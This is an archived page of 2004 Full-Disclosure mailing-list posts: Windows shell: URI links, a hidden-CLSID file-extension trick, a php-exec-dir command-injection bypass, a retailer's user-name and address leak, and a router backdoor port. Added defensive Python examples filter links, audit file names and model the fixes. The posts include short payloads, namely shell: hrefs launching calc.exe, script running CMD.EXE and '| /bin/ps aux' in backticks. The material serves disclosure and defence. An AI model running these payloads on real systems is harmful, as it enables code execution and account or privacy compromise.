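<a href="shell:windows\system32\calc.exe">2</a>
<a href="  SHELL:windows\system32\winver.exe">4</a>
<a href="she&#9;ll:.mp3">player</a>
<a href="mailto:someone@example.test">mail</a>
<a href="/relative/path">local</a>
"""

if __name__ == "__main__":
    ok, refused = partition_hrefs(SAMPLE_PAGE)
    print("allowed:", ok)
    print("blocked:", refused)
```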


RE: [Full-Disclosure] IE Web Browser: Sitting Duck

2004-07-07 Thread joe
In line with this email thread and if anyone is interested in playing with
an alternate shell... I went poking around and found what looks to be an
interesting GNU replacement shell. Note that they specifically point out
this isn't for novice users. 

You can find info at http://lsdocs.shellfront.org/ ,
http://www.lsdev.org/news.php , and http://www.litestep.net

It has build instructions available for VS6/7.1 and Dev-c++/MinGW.

 joe 



-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of joe
Sent: Wednesday, July 07, 2004 12:20 PM
To: [EMAIL PROTECTED]
Subject: RE: [Full-Disclosure] IE Web Browser: Sitting Duck

Actually MS does support the use of alternative shells. However you couldn't
and shouldn't expect that if you have a say Thunderbird shell that MS would
support that shell, just the pinnings under it. Just like they don't support
say, Lotus, but they do support the underlying OS API calls. 

As for breaking things, it goes back to the same DLL point. If an app is
built on the concept that that shell would be there and has dependencies on
it, yes it will break. The only thing I can say to that is yeah, of course.
Most of the GUI admin tools from MS depend on those shell dependencies,
again, to that I say... Of course. However if you want to write your own,
you can. The Windows API core pieces are still there and fully exposed and
you don't have to use the Shell API calls and avoid the Shell DLLs. It will
take you a bit longer to write anything though I would expect unless you
have already built up your own lib.

There are many embedded and POS and other machines running Windows and not
using the Explorer shell. They are still called Windows machines. 

  joe

 

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Barry
Fitzgerald
Sent: Wednesday, July 07, 2004 9:56 AM
To: joe
Cc: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] IE Web Browser: Sitting Duck

joe wrote:

It is a core component of the current Windows UI, this is not the same 
as being a core component of Windows. Explorer is simply a UI shell 
that sits on the operating system known as Windows. The entire shell is 
replaceable and has been for a long time, since at least Win3.1.

  


I appreciate the technical explanation even though I knew, well, all and
more of it.

You probably could have saved some time if you had read my relatively short
message fully and seen that I did acknowledge that IE is not part of the
kernel (which is really what you're trying to say) and that it's a part of
MS Windows as a software distribution.  I'm fully aware that you can replace
the shell in windows.

However, IE and the windows UI is a part of MS Windows as a software
distribution and it's an essential part.  I dare say that if you remove the
UI and DLLs of MS Windows, all you have left is a relatively crappy kernel
with a lot of software that won't work. 

The MS Windows UI and Internet Explorer are a core part of the MS Windows
operating system.  When you remove them, you break compatibility with many
of the available programs and I'd venture to say that Microsoft would not
support a highly modified system like the ones that you're describing. 

One can remove the Glibc from any GNU/Linux distribution.  I wish them luck
trying to run programs that are dynamically linked. 

Is the Glibc a core part of Linux the kernel?  Of course not.

Is the Glibc a core part of the GNU/Linux OS distribution?  Yes, it is.

I think that for all of the technical explanations that you've given, you're
losing the argument on one simple phrase: software distribution.

-Barry

p.s. Come on people.  We went through the "what does an OS really
constitute?" argument back in like 1996.  This isn't bloody kindergarten.



[Full-Disclosure] Information Week: 2/3 of pros want immediate disclosure

2004-07-07 Thread Steven M. Christey

Information Week just posted an article titled "Disclosure: Security
Pros Want Flaw Information Sooner" in which they surveyed 7,000
business technology and security professionals.  66% argued for
immediate disclosure upon discovery, and another 32% wanted disclosure
once a patch was available, leaving only 2% who said that there was no
need to disclose vulnerabilities at all:

  http://www.informationweek.com/story/showArticle.jhtml?articleID=22103495

- Steve



[Full-Disclosure] Security contact wanted

2004-07-07 Thread S G Masood

Hello,

Does anyone know the security contact for Rediff.com,
Indiatimes.com or Sify.com? Please let me know if you
do.

--
S.G.Masood





[Full-Disclosure] Chapters/Indigo Website Personal Information Leak

2004-07-07 Thread Eric Paynter
I. SUMMARY

The Chapters/Indigo website (http://www.chapters.indigo.ca/) is vulnerable
to user name guessing at the login screen and personal information leaks
(name and address) in the Wish List function.


II. BACKGROUND

Chapters/Indigo is the largest book vendor in Canada, having over C$800M
in annual revenue in the 12 months ending April, 2004. The
www.chapters.indigo.ca website offers books, CDs, DVDs, videos, and a
variety of gifts and jewelry for sale over the Internet.


III. IMPACT

Determining a matching username and password is very difficult. However,
guessing one or the other on its own is several orders of magnitude
easier. The system is nice enough to allow an attacker to work first at
getting user names, and then to attempt to guess passwords for the valid
names. Once a valid combination is found, the attacker has full access to
the user's account and can order items, have them shipped to alternate
overseas addresses, steal credit card information, etc.

A wish list is keyed to an email address. If an attacker knows a user's
email address, they can use the wish list to determine the user's full
name and address. There is no warning that the website will give out this
information to arbitrary third parties. As a matter of fact, when the user
enters their personal information, they are repeatedly assured that their
personal information will be secure.


IV. VENDOR NOTIFICATION

Chapters/Indigo was originally notified in November, 2003. There was some
discussion via email in an attempt to convince them that this was not
simply a user error. After several exchanges, they still would not
acknowledge that there was a problem, but they did indicate that
management had been informed of the situation and that the website would
be updated to be more user friendly.

As of July 6, 2004, the problems still exist.


V. SAMPLE EXPLOITS

1. User Name Leak in Login Screen

User names at www.chapters.indigo.ca are based on email addresses. At the
login page, by typing in a valid email address and invalid password, the
error "the password entered is not correct" is displayed. If an invalid
email address and some random (non-blank) password is entered, the error
"the e-mail address provided cannot be found" is displayed.

2. Personal Information Leak in Wish List Function

Equipped with a list of valid user names, an attacker may be able to obtain
additional personal information about users. If a user has created a Wish
List, then anybody can view it, simply by entering the user's email
address. The wish list not only displays the user's list of desired
products, it also allows anybody to purchase those products for the user.
If an item is selected from the Wish List and then the attacker proceeds
to check out, the website will display the user's full name and address
as confirmation of the destination for shipping. This is *not* the name
and address from the attacker's profile. This is the name and address of
the Wish List owner, which was obtained simply by knowing the user's email
address.


VI. WORKAROUNDS

1. User Name Leak in Login Screen

Find a new online retailer for your books etc..

2. Personal Information Leak in Wish List Function

Remove the shipping address from the wish list. This can be done by
following the "manage wish list" link. The default is to present the
user's last used shipping information, but this can be overridden to be
any arbitrary address, including null.

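The user-name oracle from section V.1 and the uniform-response fix, as an added example that is not code from chapters.indigo.ca or from the advisory's author. The user store, salt, passwords and message strings are constructed stand-ins; the regression check at the end is how a deployment can confirm the two failure cases are no longer distinguishable.

```python
"""Two failure messages at a login form are a user-name oracle.

Added example, not code from chapters.indigo.ca or from the advisory's
author: a model of the leaky behaviour the advisory describes, the
uniform-response fix, and a check that the fix closes the oracle.
The user store, salt and passwords are constructed.
"""
import hashlib
import hmac

_ITERATIONS = 20_000  # kept low for the demo; a real deployment uses far more
_SALT = b"constructed-demo-salt"


def _hash(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, _ITERATIONS)


# Constructed store: e-mail address -> (salt, password hash).
USERS = {"alice@example.test": (_SALT, _hash("correct horse", _SALT))}

# Compared against when the address is unknown, so the unknown-user path
# costs the same as a real verification (response time is a second oracle).
_DECOY = (_SALT, _hash("decoy password, never a real one", _SALT))

MSG_NO_USER = "the e-mail address provided cannot be found"
MSG_BAD_PW = "the password entered is not correct"
MSG_GENERIC = "the e-mail address or password is incorrect"


def login_leaky(email, password):
    """Behaviour the advisory reports: the message says which part failed."""
    if email not in USERS:
        return False, MSG_NO_USER
    salt, stored = USERS[email]
    if not hmac.compare_digest(_hash(password, salt), stored):
        return False, MSG_BAD_PW
    return True, "ok"


def login_uniform(email, password):
    """Fixed version: one message for every failure, same work on every path."""
    salt, stored = USERS.get(email, _DECOY)
    matched = hmac.compare_digest(_hash(password, salt), stored)
    if email in USERS and matched:
        return True, "ok"
    return False, MSG_GENERIC


def leaks_user_existence(login):
    """Regression check for a login function: does a wrong password produce a
    different response for a registered address than for an unknown one?"""
    known = login("alice@example.test", "definitely wrong")
    unknown = login("nobody@example.test", "definitely wrong")
    return known != unknown


if __name__ == "__main__":
    print("leaky version leaks:", leaks_user_existence(login_leaky))
    print("uniform version leaks:", leaks_user_existence(login_uniform))
```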


[Full-Disclosure] Re: backdoor menu on conexant chipset dsl router (Zoom X3)

2004-07-07 Thread duke_skillz
Citando Adam Laurie [EMAIL PROTECTED]:

 i have just installed an adsl modem sold under the brand of Zoom X3

http://www.zoom.com/products/adsl_overview.html

 and was appalled to find that an nmap scan of the external address
 immediately came up with the following:

PORT    STATE SERVICE
23/tcp  open  telnet
80/tcp  open  http
254/tcp open  unknown
255/tcp open  unknown

 ports 23 and 80 give access to the configuration menu and html interface
 as would be expected, but, although you can control access to the html
 interface, there is no control over the telnet port other than password.

 worse still, telnetting to port 254 gives you access to another menu,
 which identifies itself as ATU-R ACCESS RUNNER ADSL TERMINAL (Annex A)
 3.27, and uses the *DEFAULT* HTML management password, even if you have
 changed it to something else. i.e. changing the HTML password does not
 change this one. from this menu you can change DSL settings and issue a
 complete Factory Reset. there is a menu option to change the password,
 but this does not appear to work.

 port 255 accepts connections, but I have not investigated further.

 at the minimum this carries a risk of a trivial DOS attack (factory
 reset and everything stops working), and may actually have other more
 serious implications.

 i am disgusted that in this day and age products like this are still
 being shipped with such basic insecurities, and, accordingly, will not
 be wasting my time by looking into it any further, and will be taking
 the router back and exchanging it for something (hopefully) better
 thought out.

 to their credit, Zoom responded immediately with a workaround when i
 reported the problem, so they are clearly already aware. fyi, the
 workaround is to create dummy Virtual Servers on each of the ports
 that blackhole any incoming connections. this appears to work.

 Conexant list several other high profile retail modem manufacturers and
 pc oems, so i leave it as an exercise for the reader to work out other
 manufacturer/vulnerability combinations.

http://www.conexant.com/support/md_supportlinks.html

 enjoy,
 Adam
 --
 Adam Laurie   Tel: +44 (20) 8742 0755
 A.L. Digital Ltd. Fax: +44 (20) 8742 5995
 The Storeshttp://www.thebunker.net
 2 Bath Road   http://www.aldigital.co.uk
 London W4 1LT mailto:[EMAIL PROTECTED]
 UNITED KINGDOMPGP key on keyservers


Someone please correct me if I'm wrong, but I found reports of this issue that go
back to October 2003 ( http://www.securityfocus.com/bid/8765/ ); from research
I found that the prob is in the Conexant CX82310-14 chipset with firmware
3.21...








Re: [Full-Disclosure] shell:windows command question

2004-07-07 Thread Komrade
On Wed, 7 Jul 2004, Perrymon, Josh L. wrote:
 

-snip--
<center><br><br><img src="nocigar.gif"></center>
<center>
<a href="shell:windows\snakeoil.txt">who goes there</a></center> <iframe
src="http://windowsupdate.microsoft.com%2F.http-
equiv.dyndns.org/~http-equiv/b*llsh*t.html" style="display:none">
[customise as you see fit]
http://www.malware.com/stockpump.html
--end--
The code above has interest to me.
Even in Mozilla the commands below will work.
<a href="shell:windows\\system32\\calc.exe">1</a>
<a href="shell:windows\system32\calc.exe">2</a>
<a href="shell:windows\system32\winver.exe">4</a>
Just save them to an .html file and run it.
The first one with the double quotes was from bugtraq:
Bugtraq: Internet Explorer Causing Explorer.exe - Null Pointer Crash
http://seclists.org/lists/bugtraq/2004/Mar/0188.html
The links below that will run calc as well as winver.
It seems it calls windows as a virtual dir because c:\winxp is what I 
have.
I have been playing around to see if cmd.exe will work with it but 
without
luck.
This is what is in the registry.
HKEY_CLASSES_ROOT\Shell
Look in the registry key above. You will find the shell object calls 
Windows
Explorer with a particular set of arguments.
%SystemRoot%\Explorer.exe /e,/idlist,%I,%L
So this is tied to explorer.exe. This is something involved with the
underlying functions of windows
and not IE so to speak because it works in Mozilla or from the run line.
I'm trying to find out more about the shell: command because I can put a
link on a site that seems to run anything
in system32 dir. I'd like to see if you can pass parameters to it.

Anyone give me more info on the shell:windows command?
JP

I found an odd behaviour in my Mozilla browser when I try to execute 
this link:

<a href="shell:nofile.xul">click here</a>
(a .xul file is a Mozilla XUL Document)
When I click on the link, I see many Mozilla windows opening and 
consuming 100% of the CPU. The system became unstable, forcing me to 
disconnect from my login.

I have Mozilla 1.7b and Windows XP sp0.
This is not a real security matter, but it's quite annoying.

- Komrade -
- http://unsecure.altervista.org -


[Full-Disclosure] Fw: php-exec-dir vulnerable?

2004-07-07 Thread VeNoMouS
Php-exec-dir has been fixed, for those who care.
http://kyberdigi.cz/projects/execdir/english.html for those who need English, 
heh

Bugs
VeNoMouS reported that you can execute commands out of specified directories 
if you prepend a ';' character to the beginning of the command and try to 
execute it with the backtick operator. In the original safe_mode_exec_dir the 
backtick operator is turned off; in this patch it is not. Therefore, all the 
patches listed here were updated with a simple fix that ignores commands to 
be run through the backtick operator containing this dangerous character. A 
warning will be printed to standard output and the command will not be run. You 
are strongly encouraged to download the new patch for your version of PHP. The 
patches listed in the download section are the correct ones, so check the MD5 of the 
patch you have against those in the list. All versions from 4.3.2 to 4.3.7 
(inclusive) were vulnerable.

- Original Message - 
From: C. McCohy [EMAIL PROTECTED]
To: VeNoMouS [EMAIL PROTECTED]
Sent: Wednesday, July 07, 2004 9:43 PM
Subject: Re: php-exec-dir vulnerable?


Ok I fixed all patches to all previous and current versions of the patch,
description can be found on the project homepage
http://kyberdigi.cz/projects/execdir/
Please inform all internet groups you have informed about the bug before.
--
Baj ... C. McCohy
While you are reading this text, an essential hacking tool
is being silently installed on your computer.



[Full-Disclosure] Microsoft hides certain types of files from your eyes + some filename parsing bug

2004-07-07 Thread Good One
Microsoft HIDES certain types of files from your eyes:

This one is old unpatched "behaviour" ...

If you create in Windows Explorer a file:

test.txt
with content:

<script>
a=new ActiveXObject("WSCript.Shell");
a.run("CMD.EXE");
alert("Hello, I'm Silly Billy!");
</script>

It will be executed if you add a CLSID to its name and the user double clicks it:

test.txt.{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}

Note: 
the CLSID will remain hidden (Explorer will not show it in any way)
The file name for the user will remain: test.txt

This adds numerous possibilities for viruses to fool the end user into taking content as safe.


Another filename parsing bug (even the system cannot access it):
By some techniques Windows still allows writing a file to the hard disk with a funny name like:

test [good one :] .avi

The end user will experience certain difficulties removing it afterwards from the system.

Its name will change to "test [good one", it will have no extension, will show up as 0 bytes, etc., etc...


Of course .url and .lnk are hidden as well, being "shortcuts" in the m$ way. The contents of those files are up to you ... :-) 

For example: file "test.url" with this content will open your browser with an alert.

[DEFAULT]
BASEURL=javascript:alert('hello mama !')
[InternetShortcut]
URL=javascript:alert('hello mama !')
Modified=00027F010505010100



m$ is good for gaming, not for serious work..


- SomeMan.
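A check a defender can run over a directory listing for the three name tricks above (the hidden {CLSID} suffix, shortcut extensions Explorer never shows, and names with reserved characters), as an added example that is not code from the post's author or from Microsoft. The sample listing is constructed; the routine never touches a real directory.

```python
"""Spot file names that Explorer would display with their real type hidden.

Added example, not from the post's author or from Microsoft: an audit of
a directory listing for names carrying a hidden {CLSID} extension, shortcut
extensions that are never shown, and characters that make a name hard to
handle. SAMPLE_LISTING is constructed; nothing touches a real directory.
"""
import re

# Explorer shows "name.ext.{GUID}" as "name.ext"; the {GUID} picks the handler.
_CLSID_SUFFIX = re.compile(
    r"\.\{[0-9A-Fa-f]{8}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-"
    r"[0-9A-Fa-f]{4}-[0-9A-Fa-f]{12}\}$"
)

# Shortcut types whose extension Explorer never displays, so the visible
# name is whatever the creator chose (the post names .url and .lnk).
_HIDDEN_EXTS = (".lnk", ".url")

# Characters the Win32 namespace reserves in file names. ':' in particular
# starts an alternate data stream name, which is consistent with the
# truncated, zero-byte "test [good one" the post describes.
_RESERVED = set('<>:"/\\|?*')


def displayed_name(name):
    """Approximate the name Explorer shows for a file called name."""
    shown = _CLSID_SUFFIX.sub("", name)
    for ext in _HIDDEN_EXTS:
        if shown.lower().endswith(ext):
            return shown[: -len(ext)]
    return shown


def audit_name(name):
    """Return (displayed_name, findings) for one file name."""
    findings = []
    clsid = _CLSID_SUFFIX.search(name)
    if clsid:
        findings.append("clsid suffix " + clsid.group(0)[1:] + " hidden by Explorer")
    if _CLSID_SUFFIX.sub("", name).lower().endswith(_HIDDEN_EXTS):
        findings.append("shortcut extension never displayed")
    bad = "".join(sorted(ch for ch in set(name) if ch in _RESERVED or ord(ch) < 32))
    if bad:
        findings.append("reserved characters: " + bad)
    if name != name.rstrip(" ."):
        findings.append("trailing space or dot")
    return displayed_name(name), findings


def audit_listing(names):
    """Map each suspicious name to its (displayed_name, findings)."""
    report = {}
    for name in names:
        shown, findings = audit_name(name)
        if findings:
            report[name] = (shown, findings)
    return report


# Constructed listing: the names from the post plus an innocuous one.
SAMPLE_LISTING = [
    "test.txt.{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}",
    "readme.txt",
    "invoice.pdf.lnk",
    "test [good one :] .avi",
]

if __name__ == "__main__":
    for name, (shown, findings) in audit_listing(SAMPLE_LISTING).items():
        print(f"{name!r} shown as {shown!r}: {'; '.join(findings)}")
```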


RE: [Full-Disclosure] Microsoft hides certain types of files from your eyes + some filename parsing bug

2004-07-07 Thread Jelmer
Ancient news

http://www.guninski.com/clsidext.html


--jelmer


-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Good One
Sent: donderdag 8 juli 2004 1:37
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] Microsoft hides certain types of files from your
eyes + some filename parsing bug

Microsoft HIDES certain types of files from your eyes:
 
This one is old unpatched behaviour ...
 
If you create in Windows Explorer a file:
 
test.txt 
with content:
 
<script>
a=new ActiveXObject("WSCript.Shell");
a.run("CMD.EXE");
alert("Hello, I'm Silly Billy !");
</script>
 
It will be executed if you add a CLSID to its name and the user double
clicks it:
 
test.txt.{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}
 
Note: 
the CLSID will remain hidden (Explorer will not show it in any way)
The file name for the user will remain: test.txt
 
This adds numerous possibilities for viruses to fool the end user into taking
content as safe.
 
 
Another filename parsing bug (even the system cannot access it):
By some techniques Windows still allows writing a file to the hard disk with a funny
name like:
 
test [good one :] .avi
 
The end user will experience certain difficulties removing it afterwards from
the system.
 
Its name will change to "test [good one", it will have no extension, will
show up as 0 bytes, etc., etc...
 
 
Of course .url and .lnk are hidden as well, being "shortcuts" in the m$ way. The
contents of those files are up to you ... :-) 
 
For example: file "test.url" with this content will open your browser with
an alert.
 
[DEFAULT]
BASEURL=javascript:alert('hello mama !')
[InternetShortcut]
URL=javascript:alert('hello mama !')
Modified=00027F010505010100
 
 
m$ is good for gaming, not for serious work..
 
 
- SomeMan.
 



[Full-Disclosure] php-exec-dir vulnerable after latest upgrade

2004-07-07 Thread VeNoMouS
<?php
$blah = `| /bin/ps aux`;
echo nl2br($blah);
?>
^^ doing a |<space>ps exploits it again.
I have my exec_dir in php.ini set to /usr/local/lib/php/bin/ with nothing inside 
it, and I was still able to execute it; you HAVE to put the space after the 
pipe '|'.

- Original Message - 
From: C. McCohy [EMAIL PROTECTED]
To: VeNoMouS [EMAIL PROTECTED]
Sent: Wednesday, July 07, 2004 9:43 PM
Subject: Re: php-exec-dir vulnerable?


Ok I fixed all patches to all previous and current versions of the patch,
description can be found on the project homepage
http://kyberdigi.cz/projects/execdir/
Please inform all internet groups you have informed about the bug before.
--
Baj ... C. McCohy
While you are reading this text, an essential hacking tool
is being silently installed on your computer.

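Why the ';' and '| ' prefixes in both php-exec-dir posts get past a directory check, and what a check that holds looks like, as an added example. This is not code from the php-exec-dir patch or from PHP; it is a Python model of a check that only prefixes exec_dir onto the command line, a tokenizer that shows which programs a POSIX shell would then run, and a strict variant that builds an argv for execve() with no shell at all. EXEC_DIR reuses the php.ini value from the post and is otherwise constructed.

```python
"""A directory prefix on a shell command line is not an execution sandbox.

Added example, not code from the php-exec-dir patch or from PHP: a Python
model of the check the posts describe (the program must come from exec_dir),
a function showing which programs a POSIX shell would actually run for the
rewritten line, and a stricter version that never involves a shell.
EXEC_DIR is a constructed value taken from the post's php.ini setting.
Requires Python 3.8+ for shlex punctuation_chars with whitespace_split.
"""
import os.path
import re
import shlex

EXEC_DIR = "/usr/local/lib/php/bin"

# Operators and expansions that let one line run more than one program.
_SHELL_META = set(";|&`$<>(){}\n")
_OPERATORS = {";", ";;", "|", "||", "&", "&&", "(", ")"}
_PROGRAM_NAME = re.compile(r"^[A-Za-z0-9_][A-Za-z0-9_.-]*$")


def naive_rewrite(command):
    """Model of the flawed approach: glue EXEC_DIR in front of whatever the
    caller typed and hand the result to /bin/sh. Only the first characters
    of the line are 'inside' exec_dir; the shell decides what the rest means."""
    return EXEC_DIR + "/" + command


def programs_shell_would_run(cmdline):
    """List the program names a POSIX shell would execute for cmdline,
    one per simple command separated by ; | & or parentheses."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    programs, expect_program = [], True
    for token in lexer:
        if token in _OPERATORS:
            expect_program = True
        elif expect_program:
            programs.append(token)
            expect_program = False
    return programs


def build_argv(command):
    """Strict version: return an argv list suitable for execve() with no shell,
    or None if the command is not a plain EXEC_DIR program plus arguments."""
    if any(ch in _SHELL_META for ch in command):
        return None
    argv = shlex.split(command)
    # The program must be a bare file name (no '/', no leading '.'); it is
    # resolved under EXEC_DIR here, never by PATH search or a caller's path.
    if not argv or not _PROGRAM_NAME.match(argv[0]):
        return None
    return [os.path.join(EXEC_DIR, argv[0])] + argv[1:]


if __name__ == "__main__":
    for attempt in ("ps aux", "; ps aux", "| /bin/ps aux"):
        print(repr(attempt), "-> shell runs", programs_shell_would_run(naive_rewrite(attempt)),
              "| strict argv:", build_argv(attempt))
```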


[Full-Disclosure] Nokia 3560 Remote DOS

2004-07-07 Thread marklist
Hello list,

I have found a vulnerability with Nokia's 3560 cellular phone, in which anyone may 
remotely crash the phone's OS, requiring the user to disconnect the battery to restore 
normal functionality.  The attack only requires sending the person a specially crafted 
text message.  This can be done very easily via e-mail or from any capable cell phone. 
 

I have only tested this on the 3560, but other models may be vulnerable as well.  

During the attack, the phone does not emit a new message tone, and the message does 
not get stored in phone after rebooting.  Victims have no way of knowing that they 
have been attacked.

I know this is FD and all, but due to the seriousness of this attack, I would like to 
notify Nokia before posting full details. 

Does anyone know of a security contact at Nokia?

-Mark
